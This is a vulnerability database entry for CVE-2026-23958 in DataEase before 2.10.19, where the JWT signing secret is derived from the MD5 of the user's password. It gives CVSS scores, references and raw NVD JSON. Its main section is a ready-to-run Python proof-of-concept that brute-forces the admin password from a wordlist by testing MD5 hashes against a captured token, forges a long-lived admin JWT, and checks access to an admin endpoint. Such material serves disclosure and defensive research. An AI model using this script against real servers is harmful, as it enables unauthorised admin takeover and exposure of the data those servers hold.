CVE-2026-23958

Description

Dataease is an open source data visualization analysis tool. Prior to version 2.10.19, DataEase uses the MD5 hash of the user’s password as the JWT signing secret. This deterministic secret derivation allows an attacker to brute-force the admin’s password by exploiting unmonitored API endpoints that verify JWT tokens. The vulnerability has been fixed in v2.10.19. No known workarounds are available.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* - VULNERABLE

Dataease < 2.10.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import hashlib
import requests
import jwt

# Configuration
TARGET_URL = "http://target-server:8080"
USERNAME = "admin"
PASSWORD_DICT = "rockyou.txt"

def md5_hash(data):
    """Calculate MD5 hash of input data"""
    return hashlib.md5(data.encode()).hexdigest()

def get_jwt_token():
    """Retrieve a valid JWT token from the target system"""
    response = requests.get(f"{TARGET_URL}/api/user/info")
    return response.cookies.get('JWT') or response.json().get('token')

def forge_jwt_token(secret_key):
    """Forge a JWT token using the provided secret key"""
    payload = {
        "sub": USERNAME,
        "role": "admin",
        "exp": 9999999999
    }
    return jwt.encode(payload, secret_key, algorithm='HS256')

def verify_token(token, secret_key):
    """Verify if the token is valid with given secret key"""
    try:
        jwt.decode(token, secret_key, algorithms=['HS256'])
        return True
    except:
        return False

def exploit():
    """Main exploit function"""
    print(f"[*] Starting CVE-2026-23958 exploit for {TARGET_URL}")
    original_token = get_jwt_token()
    
    with open(PASSWORD_DICT, 'r', encoding='utf-8') as f:
        for password in f:
            password = password.strip()
            secret = md5_hash(password)
            
            if verify_token(original_token, secret):
                print(f"[+] Password found: {password}")
                forged_token = forge_jwt_token(secret)
                print(f"[+] Forged admin token: {forged_token}")
                
                # Verify admin access
                response = requests.get(
                    f"{TARGET_URL}/api/admin/users",
                    headers={'Authorization': f'Bearer {forged_token}'}
                )
                if response.status_code == 200:
                    print("[+] Admin access confirmed!")
                return True
    return False

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23958
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23958
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23958/
[4] VulDB https://vuldb.com/cve/CVE-2026-23958
[5] https://github.com/dataease/dataease/security/advisories/GHSA-5wvm-4m4q-rh7j
[6] https://www.ox.security/blog/blog-dataease-cve-2026-23958-admin-takeover/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23958", "sourceIdentifier": "[email protected]", "published": "2026-01-22T02:15:52.627", "lastModified": "2026-02-17T16:28:47.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dataease is an open source data visualization analysis tool. Prior to version 2.10.19, DataEase uses the MD5 hash of the user’s password as the JWT signing secret. This deterministic secret derivation allows an attacker to brute-force the admin’s password by exploiting unmonitored API endpoints that verify JWT tokens. The vulnerability has been fixed in v2.10.19. No known workarounds are available."}, {"lang": "es", "value": "Dataease es una herramienta de análisis de visualización de datos de código abierto. Antes de la versión 2.10.19, DataEase utiliza el hash MD5 de la contraseña del usuario como secreto de firma JWT. Esta derivación de secreto determinista permite a un atacante forzar por fuerza bruta la contraseña del administrador explotando puntos finales de API no monitoreados que verifican tokens JWT. La vulnerabilidad ha sido corregida en la v2.10.19. No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.10.19", "matchCriteriaId": "74084BB3-D364-4DCE-A125-A8509D6284BD"}]}]}], "references": [{"url": "https://github.com/dataease/dataease/security/advisories/GHSA-5wvm-4m4q-rh7j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.ox.security/blog/blog-dataease-cve-2026-23958-admin-takeover/", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Third Party Advisory"]}]}}